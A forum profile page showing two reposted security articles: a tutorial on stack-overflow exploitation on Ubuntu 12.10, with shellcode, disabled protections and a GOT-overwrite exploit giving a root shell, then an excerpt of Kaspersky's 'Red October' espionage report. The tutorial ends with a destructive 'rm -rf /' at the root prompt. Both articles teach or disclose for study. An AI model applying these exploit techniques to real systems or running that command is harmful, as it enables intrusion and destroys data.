Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=1]Stack Smashing On A Modern Linux System[/h] Stack Smashing On A Modern Linux System 21 December, 2012 - 06:56 — jip Prerequisites: Basic understanding of C and and x86_64 assembly. +++++++++++++++++++++++++++++++++++++++++++ + Stack Smashing On A Modern Linux System + + jip@soldierx.com + +++++++++++++++++++++++++++++++++++++++++++ [1. Introduction] This tutorial will attempt to show the reader the basics of stack overflows and explain some of the protection mechanisms present in modern linux distributions. For this purpose the latest version of Ubuntu (12.10) has been chosen because it incorporates several security mechanisms by default, and is overall a popular distribution that is easy to install and use. The platform is x86_64. The reader will learn how stack overflows were originally exploited on older systems that did not have these mechanisms in place by default. The individual protections in the latest version of Ubuntu at the time of writing (12.10) will be explained, and a case will be presented in which these are not sufficient to prevent the overflowing of a data structure on the stack that will result in control of the execution path of the program. Although the method of exploitation presented does not resemble the classical method of overflowing (or "smashing") the stack and is in fact closer to the method used for heap overflows or format string bugs (exploiting an arbitrary write), the overflow does happen on the stack in spite of Stack Smashing Protection being used to prevent stack overflows from happening. Now if this does not make sense to you yet, don't worry. I will go into more detail below. [2. System details] An overview of the default security mechanisms deployed in different versions of Ubuntu can be found here: https://wiki.ubuntu.com/Security/Features ----------------------------------- $ uname -srp && cat /etc/lsb-release | grep DESC && gcc --version | grep gcc Linux 3.5.0-19-generic x86_64 DISTRIB_DESCRIPTION="Ubuntu 12.10" gcc (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2 ----------------------------------- [3. The classical stack overflow] Let's go back in time. Life was easy and stack frames were there to be smashed. Sloppy use of data copying methods on the stack could easily result in total control over the program. Not many protection mechanisms had to be taken into account, as demonstrated below. ----------------------------------- $ cat oldskool.c #include <string.h> void go(char *data) { char name[64]; strcpy(name, data); } int main(int argc, char **argv) { go(argv[1]); } ----------------------------------- Before testing, you should disable ASLR system-wide, you can do this as follows: ----------------------------------- $ sudo -i root@laptop:~# echo "0" > /proc/sys/kernel/randomize_va_space root@laptop:~# exit logout ----------------------------------- In very old systems this protection mechanism didn't exist. So for the purpose of this historical example it has been disabled. To disable the other protections, you can compile this example as follows: $ gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g Looking at the rest of the example, we see that there is a buffer of 64 bytes allocated on the stack, and that the first argument on the command line is copied into this buffer. The program does not check whether that argument is longer than 64 bytes, allowing strcpy() to keep copying data past the end of the buffer into adjacent memory on the stack. This is known as a stack overflow. Now in order to gain control of execution of the program we are going to use the fact that before entering a function, any c program pushes the address of the instruction it is supposed to execute after completing the function onto the stack. We call this address the return address, or Saved Instruction Pointer. In our example the Saved Instruction Pointer (the address of the instruction that is supposed to be executed after completion of the go() function) is stored next to our name[64] buffer, because of the way the stack works. So if the user can overwrite this return address with any address (supplied via the command line argument), the program will continue executing at this address. An attacker can hijack the flow of execution by copying instructions in their machine code form into the buffer and then pointing the return address to those instructions. When the program is done executing the function, it will continue executing the instructions provided by the attacker. The attacker can now make the program do anything for fun and profit. Enough talk, let me show you. If you don't understand the following commands, you can find a tutorial on how to use gdb here: http://beej.us/guide/bggdb/ ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) disas main Dump of assembler code for function main: 0x000000000040053d <+0>: push %rbp 0x000000000040053e <+1>: mov %rsp,%rbp 0x0000000000400541 <+4>: sub $0x10,%rsp 0x0000000000400545 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400548 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040054c <+15>: mov -0x10(%rbp),%rax 0x0000000000400550 <+19>: add $0x8,%rax 0x0000000000400554 <+23>: mov (%rax),%rax 0x0000000000400557 <+26>: mov %rax,%rdi 0x000000000040055a <+29>: callq 0x40051c 0x000000000040055f <+34>: leaveq 0x0000000000400560 <+35>: retq End of assembler dump. (gdb) break *0x40055a Breakpoint 1 at 0x40055a: file oldskool.c, line 11. (gdb) run myname Starting program: /home/me/.hax/vuln/oldskool myname Breakpoint 1, 0x000000000040055a in main (argc=2, argv=0x7fffffffe1c8) 11 go(argv[1]); (gdb) x/i $rip => 0x40055a : callq 0x40051c (gdb) i r rsp rsp 0x7fffffffe0d0 0x7fffffffe0d0 (gdb) si go (data=0xc2 ) at oldskool.c:4 4 void go(char *data) { (gdb) i r rsp rsp 0x7fffffffe0c8 0x7fffffffe0c8 (gdb) x/gx $rsp 0x7fffffffe0c8: 0x000000000040055f ----------------------------------- We set a breakpoint right before the call to go(), at 0x000000000040055a <+29>. Then we run the program with the argument "myname", and it stops before calling go(). We execute one instruction (si) and see that the stack pointer (rsp) now points to a location containing the address right after the callq go instruction at 0x000000000040055f <+34>. This demonstrates exactly what was discussed above. The following output will demonstrate that when the go() function is done, it will execute the "retq" instruction, which will pop this pointer off the stack, and continue execution at whatever address it points to. ----------------------------------- (gdb) disas go Dump of assembler code for function go: => 0x000000000040051c <+0>: push %rbp 0x000000000040051d <+1>: mov %rsp,%rbp 0x0000000000400520 <+4>: sub $0x50,%rsp 0x0000000000400524 <+8>: mov %rdi,-0x48(%rbp) 0x0000000000400528 <+12>: mov -0x48(%rbp),%rdx 0x000000000040052c <+16>: lea -0x40(%rbp),%rax 0x0000000000400530 <+20>: mov %rdx,%rsi 0x0000000000400533 <+23>: mov %rax,%rdi 0x0000000000400536 <+26>: callq 0x4003f0 0x000000000040053b <+31>: leaveq 0x000000000040053c <+32>: retq End of assembler dump. (gdb) break *0x40053c Breakpoint 2 at 0x40053c: file oldskool.c, line 8. (gdb) continue Continuing. Breakpoint 2, 0x000000000040053c in go (data=0x7fffffffe4b4 "myname") 8 } (gdb) x/i $rip => 0x40053c : retq (gdb) x/gx $rsp 0x7fffffffe0c8: 0x000000000040055f (gdb) si main (argc=2, argv=0x7fffffffe1c8) at oldskool.c:12 12 } (gdb) x/gx $rsp 0x7fffffffe0d0: 0x00007fffffffe1c8 (gdb) x/i $rip => 0x40055f : leaveq (gdb) quit ----------------------------------- We set a breakpoint right before the go() function returns and continue execution. The program stops right before executing the "retq" instruction. We see that the stack pointer (rsp) still points to the address inside of main that the program is supposed to jump to after finishing the execution of go(). The retq instruction is executed, and we see that the program has indeed popped the return address off the stack and has jumped to it. Now we are going to overwrite this address by supplying more than 32 bytes of data, using perl: ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) run `perl -e 'print "A"x48'` Starting program: /home/me/.hax/vuln/oldskool `perl -e 'print "A"x48'` Program received signal SIGSEGV, Segmentation fault. 0x000000000040059c in go (data=0x7fffffffe49a 'A' ) 12 } (gdb) x/i $rip => 0x40059c : retq (gdb) x/gx $rsp 0x7fffffffe0a8: 0x4141414141414141 ----------------------------------- We use perl to print a string of 80 x "A" on the command line, and pass that as an argument to our example program. We see that the program crashes when it tries to execute the "retq" instruction inside the go() function, since it tries to jump to the return address which we have overwritten with "A"s (0x41). Note that we have to write 80 bytes (64 + 8 + 8 ) because pointers are 8 bytes long on 64 bit machines, and there is actually another stored pointer between our name buffer and the Saved Instruction Pointer. Okay, so now we can redirect the execution path to any location we want. How can we use this to make the program do our bidding? If we place our own machine code instructions inside the name[] buffer and then overwrite the return address with the address of the beginning of this buffer, the program will continue executing our instructions (or "shellcode") after it's done executing the go function. So we need to create a shellcode, and we need to know the address of the name[] buffer so we know what to overwrite the return address with. I will not go into creating shellcode as this is a little bit outside the scope of this tutorial, but will instead provide you with a shellcode that prints a message to the screen. We can determine the address of the name[] buffer like this: ----------------------------------- (gdb) p &name $2 = (char [32]) 0x7fffffffe0a0 ----------------------------------- We can use perl to print unprintable characters to the command line, by escaping them like this: "\x41". Furthermore, because of the way little-endian machines store integers and pointers, we have to reverse the order of the bytes. So the value we will use to overwrite the Saved Instruction Pointer will be: "\xa0\xe0\xff\xff\xff\x7f" This is the shellcode that will print our message to the screen and then exit: "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48 \x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9 \xff\xff\xff\x48\x61\x78\x21" Note that these are just instructions in machine code form, escaped so that they are printable with perl. Because the shellcode is 45 bytes long, and we need to provide 72 bytes of data before we can overwrite the SIP, we have to add 27 bytes as padding. So the string we use to own the program looks like this: "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48 \x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9 \xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0\xff\xff\xff\x7f" The program will jump to 0x7fffffffe0a0 when it is done executing the function go(). This is where the name[] buffer is located, which we have filled with our machine code. It should then execute our machine code to print our message and exit the program. Let's try it (note that you should remove all line breaks when you try to reproduce this): ----------------------------------- $ ./oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48 \xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c \x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0 \xff\xff\xff\x7f"'` Hax!$ ----------------------------------- It worked! Our important message has been delivered, and the process has exit. [4. Protection mechanisms] Welcome back to 2012. The example above does not work anymore on so many levels. There are a lot of different protection mechanisms in place today on our ubuntu system, and this particular type of vulnerability does not even exist in this form anymore. There are still overflows that can happen on the stack though, and there are still ways of exploiting them. That is what I want to show you in this section, but first let's look at the different protection schemes. [4.1 Stack Smashing Protection] In the first example, we used the -fno-stack-protector flag to indicate to gcc that we did not want to compile with stack smashing protection. What happens if we leave this out, along with the other flags we passed earlier? Note that at this point ASLR is back on and so everything is set to their defaults. $ gcc oldskool.c -o oldskool -g Let's look at the binary with gdb for a minute and see what's going on. ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) disas go Dump of assembler code for function go: 0x000000000040058c <+0>: push %rbp 0x000000000040058d <+1>: mov %rsp,%rbp 0x0000000000400590 <+4>: sub $0x60,%rsp 0x0000000000400594 <+8>: mov %rdi,-0x58(%rbp) 0x0000000000400598 <+12>: mov %fs:0x28,%rax 0x00000000004005a1 <+21>: mov %rax,-0x8(%rbp) 0x00000000004005a5 <+25>: xor %eax,%eax 0x00000000004005a7 <+27>: mov -0x58(%rbp),%rdx 0x00000000004005ab <+31>: lea -0x50(%rbp),%rax 0x00000000004005af <+35>: mov %rdx,%rsi 0x00000000004005b2 <+38>: mov %rax,%rdi 0x00000000004005b5 <+41>: callq 0x400450 0x00000000004005ba <+46>: mov -0x8(%rbp),%rax 0x00000000004005be <+50>: xor %fs:0x28,%rax 0x00000000004005c7 <+59>: je 0x4005ce 0x00000000004005c9 <+61>: callq 0x400460 <__stack_chk_fail@plt> 0x00000000004005ce <+66>: leaveq 0x00000000004005cf <+67>: retq End of assembler dump. ----------------------------------- If we look at go+12 and go+21, we see that a value is taken from $fs+0x28, or %fs:0x28. What exactly this address points to is not very important, for now I will just say fs points to structures maintained by the kernel, and we can't actually inspect the value of fs using gdb. What is more important to us is that this location contains a random value that we cannot predict, as demonstrated: ----------------------------------- (gdb) break *0x0000000000400598 Breakpoint 1 at 0x400598: file oldskool.c, line 4. (gdb) run Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, go (data=0x0) at oldskool.c:4 4 void go(char *data) { (gdb) x/i $rip => 0x400598 : mov %fs:0x28,%rax (gdb) si 0x00000000004005a1 4 void go(char *data) { (gdb) i r rax rax 0x110279462f20d000 1225675390943547392 (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, go (data=0x0) at oldskool.c:4 4 void go(char *data) { (gdb) si 0x00000000004005a1 4 void go(char *data) { (gdb) i r rax rax 0x21f95d1abb2a0800 2448090241843202048 ----------------------------------- We break right before the instruction that moves the value from $fs+0x28 into rax and execute it, inspect rax and repeat the whole process and see clearly that the value changed between runs. So this is a value that is different every time the program runs, which means that an attacker can't reliably predict it. So how is this value used to protect the stack? If we look at go+21 we see that the value is copied onto the stack, at location -0x8(%rbp). If we look at the prologue to deduct what that points at, we see that this random value is right in between the function's local variables and the saved instruction pointer. This is called a "canary" value, referring to the canaries miners use to alert them whenever a gas leak is going on, since the canaries would die way before any human is in danger. Much like that situation, when a stack overflow occurs, the canary value would be the first to die, before the saved instruction pointer could be overwritten. If we look at go+46 and go+50, we see that the value is read from the stack and compared to the original value. If they are equal, the canary has not been changed and thus the saved instruction pointer hasn't been altered either, allowing the function to return safely. If the value has been changed, a stack overflow has occured and the saved instruction pointer may have been compromised. Since it's not safe to return, the function instead calls the __stack_chk_fail function. This function does some magic, throws an error and eventually exits the process. This is what that looks like: ----------------------------------- $ ./oldskool `perl -e 'print "A"x80'` *** stack smashing detected ***: ./oldskool terminated Aborted (core dumped) ----------------------------------- So to recap, the buffer is overflowed, and data is copied over the canary value and over the saved instruction pointer. However, before attempting to return to this overwritten SIP, the program detects that the canary has been tampered with and exits safely before doing the attackers bidding. Now the bad news is that there is not really a good way around this situation for the attacker. You might think about bruteforcing the stack canary, but in this case it would be different for every run, so you would have to be extremely lucky to hit the right value. It would take some time and would not be very stealthy either. The good news is that there are plenty of situations in which this is not sufficient to prevent exploitation. For example, stack canaries are only used to protect the SIP and not to protect application variables. This could lead to other exploitable situations, as shown later. The oldskool method of "smashing" the stack frame to trick the program into returning to our code is effectively killed by this protection mechanism though; it is no longer viable. [4.2 NX: non-executable memory] Now you might have noticed we did not just skip the -fno-stack-protector flag this time, but we also left out the -zexecstack flag. This flag told the system to allow us to execute instructions stored on the stack. Modern systems do not allow for this to happen, by either marking memory as writable for data, or executable for instructions. No region of memory will be both writable and executable at the same time. If you think about this, this means that the we have no way of storing shellcode in memory that the program could later execute. Since we cannot write to the executable sections of memory and the program can't execute instructions located in the writable sections of memory, we will need some other way to trick the program into doing what we want. The answer is ROP, or Return-Oriented Programming. The trick here is to use parts of code that are already in the program itself, thus located in the executable .text section of the binary, and chain them together in a way so that they will resemble our old shellcode. I will not go too deeply into this subject, but I will show you an example at the end of this tutorial. Let me finish by demonstrating that a program will fail when trying to execute instructions from the stack: ----------------------------------- $ cat nx.c int main(int argc, char **argv) { char shellcode[] = "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff" "\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48" "\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21"; void (*func)() = (void *)shellcode; func(); } $ gcc nx.c -o nx -zexecstack $ ./nx Hax!$ $ gcc nx.c -o nx $ ./nx Segmentation fault (core dumped) ----------------------------------- We placed our shellcode from earlier in a buffer on the stack, and set a function pointer to point to that buffer before calling it. When we compile with the -zexecstack like before, the code can be executed on the stack. But without the flag, the stack is marked as non executable by default, and the program will fail with a segmentation fault. [4.3 ASLR: Address Space Layout Randomization] The last thing we disabled when trying out the classic stack overflow example was ASLR, by executing echo "0" > /proc/sys/kernel/randomize_va_space as root. ASLR makes sure that every time the program is loaded, it's libraries and memory regions are mapped at random locations in virtual memory. This means that when running the program twice, buffers on the stack will have different addresses between runs. This means that we cannot simply use a static address pointing to the stack that we happened to find by using gdb, because these addresses will not be correct the next time the program is run. Note that gdb will disable ASLR when debugging a program, and we can enable it inside gdb for a more realistic view of what's going on as shown below (output is trimmed on the right, the addresses are what's important here): ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) set disable-randomization off (gdb) break main Breakpoint 1 at 0x4005df: file oldskool.c, line 11. (gdb) run Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, main (argc=1, argv=0x7fffe22fe188) at oldskool.c:11 11 go(argv[1]); (gdb) i proc map process 6988 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x401000 0x1000 0x0 /home/me/.hax/vuln 0x600000 0x601000 0x1000 0x0 /home/me/.hax/vuln 0x601000 0x602000 0x1000 0x1000 /home/me/.hax/vuln 0x7f0e120ef000 0x7f0e122a4000 0x1b5000 0x0 /lib/x86_64-linux- 0x7f0e122a4000 0x7f0e124a3000 0x1ff000 0x1b5000 /lib/x86_64-linux- 0x7f0e124a3000 0x7f0e124a7000 0x4000 0x1b4000 /lib/x86_64-linux- 0x7f0e124a7000 0x7f0e124a9000 0x2000 0x1b8000 /lib/x86_64-linux- 0x7f0e124a9000 0x7f0e124ae000 0x5000 0x0 0x7f0e124ae000 0x7f0e124d0000 0x22000 0x0 /lib/x86_64-linux- 0x7f0e126ae000 0x7f0e126b1000 0x3000 0x0 0x7f0e126ce000 0x7f0e126d0000 0x2000 0x0 0x7f0e126d0000 0x7f0e126d1000 0x1000 0x22000 /lib/x86_64-linux- 0x7f0e126d1000 0x7f0e126d3000 0x2000 0x23000 /lib/x86_64-linux- 0x7fffe22df000 0x7fffe2300000 0x21000 0x0 [stack] 0x7fffe23c2000 0x7fffe23c3000 0x1000 0x0 [vdso] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, main (argc=1, argv=0x7fff7e16cfd8) at oldskool.c:11 11 go(argv[1]); (gdb) i proc map process 6991 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x401000 0x1000 0x0 /home/me/.hax/vuln 0x600000 0x601000 0x1000 0x0 /home/me/.hax/vuln 0x601000 0x602000 0x1000 0x1000 /home/me/.hax/vuln 0x7fdbb2753000 0x7fdbb2908000 0x1b5000 0x0 /lib/x86_64-linux- 0x7fdbb2908000 0x7fdbb2b07000 0x1ff000 0x1b5000 /lib/x86_64-linux- 0x7fdbb2b07000 0x7fdbb2b0b000 0x4000 0x1b4000 /lib/x86_64-linux- 0x7fdbb2b0b000 0x7fdbb2b0d000 0x2000 0x1b8000 /lib/x86_64-linux- 0x7fdbb2b0d000 0x7fdbb2b12000 0x5000 0x0 0x7fdbb2b12000 0x7fdbb2b34000 0x22000 0x0 /lib/x86_64-linux- 0x7fdbb2d12000 0x7fdbb2d15000 0x3000 0x0 0x7fdbb2d32000 0x7fdbb2d34000 0x2000 0x0 0x7fdbb2d34000 0x7fdbb2d35000 0x1000 0x22000 /lib/x86_64-linux- 0x7fdbb2d35000 0x7fdbb2d37000 0x2000 0x23000 /lib/x86_64-linux- 0x7fff7e14d000 0x7fff7e16e000 0x21000 0x0 [stack] 0x7fff7e1bd000 0x7fff7e1be000 0x1000 0x0 [vdso] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] ----------------------------------- We set "disable-randomization" to "off", we run the program twice and inspect the mappings to see that most of them have different addresses. Indeed, not all of them do, and this is the key to succesful exploitation with ASLR enabled. [5. Modern stack overflow] So, even with all these protection mechanisms in place, sometimes there is room for an overflow. And sometimes that overflow leads to successful exploitation. I showed you how the stack canary protects the stack frame from being messed up and the SIP from being overwritten by copying past the end of a local buffer. But the stack canaries are only placed before the SIP, not between variables located on the stack. So it is still possible for a variable on the stack to be overwritten in the same fashion as the SIP was overwritten in our first example. This can lead to a lot of different problems, in some cases we can simply overwrite a function pointer that is called at some point. In some other cases we can overwrite a pointer that is later used to write or read data, and thus control this read or write. This is what I am going to show you. By overflowing a buffer on the stack and overwriting a pointer on the stack that is later used to write user-supplied data, the attacker can write data to an arbitrary location. A situation like this can often be exploited to gain control of execution. Here is the source code of the example vulnerability: ----------------------------------- $ cat stackvuln.c #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #define MAX_SIZE 48 #define BUF_SIZE 64 char data1[BUF_SIZE], data2[BUF_SIZE]; struct item { char data[MAX_SIZE]; void *next; }; int go(void) { struct item item1, item2; item1.next = &item2; item2.next = &item1; memcpy(item1.data, data1, BUF_SIZE); // Whoops, did we mean MAX_SIZE? memcpy(item1.next, data2, MAX_SIZE); // Yes, yes we did. exit(-1); // Exit in shame. } void hax(void) { execl("/bin/bash", "/bin/bash", "-p", NULL); } void readfile(char *filename, char *buffer, int len) { FILE *fp; fp = fopen(filename, "r"); if (fp != NULL) { fread(buffer, 1, len, fp); fclose(fp); } } int main(int argc, char **argv) { readfile("data1.dat", data1, BUF_SIZE); readfile("data2.dat", data2, BUF_SIZE); go(); } $ gcc stackvuln.c -o stackvuln $ sudo chown root:root stackvuln $ sudo chmod +s ./stackvuln ----------------------------------- For the purpose of this example, I have included the "hax()" function which is obviously where we want to redirect execution to. Originally I wanted to include an example using a ROP chain to call a function like system(), but I decided not to for two reasons: it is perhaps a little bit out of scope for this tutorial and I think it would make this tutorial too hard to follow for beginners, besides that it was quite hard to find good gadgets in a program this small. The use of this function does illustrate the point that because of NX, we can't push our own shellcode onto the stack and execute it, but we have to reuse code that is in the program already (be it a function, or a chain of ROP gadgets). Google ROP exploitation if you are interested in the real deal. Our overflow happens in the go() function. It creates a circular list with two items of the 'struct item' type. The first memcpy accidentally copies too many bytes into the structure, allowing us to overwrite the "next" pointer which is used to write to in the second call. So, if we can overwrite the next pointer with an address of our choice, we can control where memcpy writes to. Besides, we also control data1 and data2, because these buffers are read from a file. This data could've come from a network connection or some other input, but I chose to use files because it allows us to easily alter the payloads for demonstration purposes. So, we can write any 48 bytes we want, to any location we want. How can we use this to gain control of the program? We are going to use a structure called the GOT/PLT. I will try to explain quickly what it is, but if you need more information there is a lot of it on the web. The .got.plt is a table of addresses that a binary uses to keep track of the location of functions that are in a library. As I explained before, ASLR makes sure that a library is mapped to a different virtual memory address every time the program runs. So the program can't use static absolute addresses to refer to functions inside these libraries, because these addresses would change every run. So, the short version is, it uses a mechanism that calls a stub to calculate the real address of the function, store it in a table, and use that for future reference. So every time the function is called, the address inside this table (.got.plt) is used. We can abuse this by overwriting this address, so that the next time the program thinks it's calling the function that corresponds with that particular entry, it will be redirected to an instruction of our choice, much like the redirection we used before by overwriting the return pointer. If we look at our example, we see that exit() is called right after the calls to memcpy(). So, if we can use the arbitrary write provided by those calls to overwrite the .got.plt entry of exit(), the program will jump to the address we provided instead of the address of exit() inside libc. Which address will we use? You guessed it, the address of hax(). First, let me show you how the .got.plt is used when exit() is called: ----------------------------------- $ cat exit.c #include <stdlib.h> int main(int argc, char **argv) { exit(0); } $ gcc exit.c -o exit -g $ gdb -q ./exit Reading symbols from /home/me/.hax/plt/exit...done. (gdb) disas main Dump of assembler code for function main: 0x000000000040051c <+0>: push %rbp 0x000000000040051d <+1>: mov %rsp,%rbp 0x0000000000400520 <+4>: sub $0x10,%rsp 0x0000000000400524 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400527 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040052b <+15>: mov $0x0,%edi 0x0000000000400530 <+20>: callq 0x400400 End of assembler dump. (gdb) x/i 0x400400 0x400400 : jmpq *0x200c1a(%rip) # 0x601020 (gdb) x/gx 0x601020 0x601020 : 0x0000000000400406 ----------------------------------- We see at main+20 that instead of calling exit inside libc directly, 0x400400 is called, which is a stub inside the plt. It jumps to whatever address is located at 0x601020, inside the got.plt. Now in this case this is an address back inside the stub again, which resolves the address of the function inside libc, and replaces the entry in 0x601020 with the real address of exit. So whenever exit is called, the address 0x601020 is used regardless of whether the real address has been resolved yet or not. So, we need to overwrite this location with the address of the hax() function, and the program will execute that function instead of exit(). So for our example vulnerability, we need to locate where the entry to exit is inside the .got.plt, overwrite the pointer in the structure with this address, and then fill the data2 buffer with the pointer to the hax() function. The first call will then overwrite the item1.next pointer with the pointer to the exit entry inside got.plt, the second call will overwrite this location with the pointer to hax(). After that, exit() is called so our pointer is used and hax() will execute, spawning a root shell. Let's go! Oh, one more thing: because the entry of execl() is located right after the entry of exit() and our memcpy call will copy 48 bytes, we need to make sure that this pointer is not wrecked by including it in our payload. ----------------------------------- (gdb) mai i sect .got.plt Exec file: `/tmp/stackvuln/stackvuln', file type elf64-x86-64. 0x00601000->0x00601050 at 0x00001000: .got.plt ALLOC LOAD DATA HAS_CONTENTS (gdb) x/10gx 0x601000 0x601000: 0x0000000000600e28 0x0000000000000000 0x601010: 0x0000000000000000 0x0000000000400526 0x601020 < fclose@got.plt>: 0x0000000000400536 0x0000000000400546 0x601030 < memcpy@got.plt>: 0x0000000000400556 0x0000000000400566 0x601040 < exit@got.plt>: 0x0000000000400576 0x0000000000400586 (gdb) p hax $1 = {< text variable, no debug info >} 0x40073b ----------------------------------- Okay, so the entry of exit is at 0x601040, and hax() is at 0x40073b. Let's construct our payloads: ----------------------------------- $ hexdump data1.dat -vC 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000030 40 10 60 00 00 00 00 00 |@.`.....| 00000038 $ hexdump data2.dat -vC 00000000 3b 07 40 00 00 00 00 00 86 05 40 00 00 00 00 00 |;.@.......@.....| 00000010 ----------------------------------- For the first call, we use 48 bytes of padding, and then overwrite the "next" pointer with a pointer to the .got.plt entry. Remember that because we are on a little-endian architecture, the order of the individual bytes of the address is reversed. The second file contains the pointer to the function of hax(), which will be written to the .got.plt in the exit() entry. The second address is the entry of execl(), and contains it's original address just to make sure it is still callable. After the two calls to memcpy, exit@plt will be called and will use our address to hax() from the .got.plt. This will mean hax() gets executed. ----------------------------------- $ ./stackvuln bash-4.2# whoami root bash-4.2# rm -rf / Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
  2. "Red October" Diplomatic Cyber Attacks Investigation Contents Executive Summary Anatomy of the attack General description Step-by-step description (1st stage) Step-by-step description (2nd stage) [*]Timeline [*]Targets KSN statistics [*]Sinkhole statistics [*]KSN + sinkhole data [*]?&C information Executive Summary In October 2012, Kaspersky Lab’s Global Research & Analysis Team initiated a new threat research after a series of attacks against computer networks of various international diplomatic service agencies. A large scale cyber-espionage network was revealed and analyzed during the investigation, which we called «Red October» (after famous novel «The Hunt For The Red October»). This report is based on detailed technical analysis of a series of targeted attacks against diplomatic, governmental and scientific research organizations in different countries, mostly related to the region of Eastern Europe, former USSR members and countries in Central Asia. The main objective of the attackers was to gather intelligence from the compromised organizations, which included computer systems, personal mobile devices and network equipment. The earliest evidence indicates that the cyber-espionage campaign was active since 2007 and is still active at the time of writing (January 2013). Besides that, registration data used for the purchase of several Command & Control (C&C) servers and unique malware filenames related to the current attackers hints at even earlier time of activity dating back to May 2007. Main Findings Advanced Cyber-espionage Network: The attackers have been active for at least several years, focusing on diplomatic and governmental agencies of various countries across the world. Information harvested from infected networks was reused in later attacks. For example, stolen credentials were compiled in a list and used when the attackers needed to guess secret phrase in other locations. To control the network of infected machines, the attackers created more than 60 domain names and several server hosting locations in different countries (mainly Germany and Russia). The C&C infrastructure is actually a chain of servers working as proxies and hiding the location of the ‘mothership’ control server. Unique architecture: The attackers created a multi-functional kit which has a capability of quick extension of the features that gather intelligence. The system is resistant to C&C server takeover and allows the attack to recover access to infected machines using alternative communication channels. Broad variety of targets: Beside traditional attack targets (workstations), the system is capable of stealing data from mobile devices, such as smartphones (iPhone, Nokia, Windows Mobile), enterprise network equipment (Cisco), removable disk drives (including already deleted files via a custom file recovery procedure). Importation of exploits: The samples we managed to find were using exploit code for vulnerabilities in Microsoft Word and Microsoft Excel that were created by other attackers and employed during different cyber attacks. The attackers left the imported exploit code untouched, perhaps to harden the identification process. Attacker identification: Basing on registration data of C&C servers and numerous artifacts left in executables of the malware, we strongly believe that the attackers have Russian-speaking origins. Current attackers and executables developed by them have been unknown until recently, they have never related to any other targeted cyberattacks. Anatomy of the attack General description These attacks comprised of the classical scenario of specific targeted attacks, consisting of two major stages: Initial infection Additional modules deployed for intelligence gathering The malicious code was delivered via e-mail as attachments (Microsoft Excel, Word and, probably PDF documents) which were rigged with exploit code for known security vulnerabilities in the mentioned applications. Right after the victim opened the malicious document on a vulnerable system, the embedded malicious code initiated the setup of the main component which in turn handled further communication with the C&C servers. Next, the system receives a number of additional spy modules from the C&C server, including modules to handle infection of smartphones. The main purpose of the spying modules is to steal information. This includes files from different cryptographic systems, such as «Acid Cryptofiler», (see https://fr.wikipedia.org/wiki/Acid_Cryptofiler) which is known to be used in organizations of European Union/European Parliament/European Commission since the summer of 2011. All gathered information is packed, encrypted and only then transferred to the C&C server. Step-by-step description (1st stage) During our investigation we couldn’t find any e-mails used in the attacks, only top level dropper documents. Nevertheless, based on indirect evidence, we know that the e-mails can be sent using one of the following methods: Using an anonymous mailbox from a free public email service provider Using mailboxes from already infected organizations E-mail subject lines as well as the text in e-mail bodies varied depending on the target (recipient). The attached file contained the exploit code which activated a Trojan dropper in the system. We have observed the use of at least three different exploits for previously known vulnerabilities: CVE-2009-3129 (MS Excel), CVE-2010-3333 (MS Word) and CVE-2012-0158 (MS Word). The first attacks that used the exploit for MS Excel started in 2010, while attacks targeting the MS Word vulnerabilities appeared in the summer of 2012. As a notable fact, the attackers used exploit code that was made public and originally came from a previously known targeted attack campaign with Chinese origins. The only thing that was changed is the executable which was embedded in the document; the attackers replaced it with their own code. Articol complet: http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation Partea a II-a: 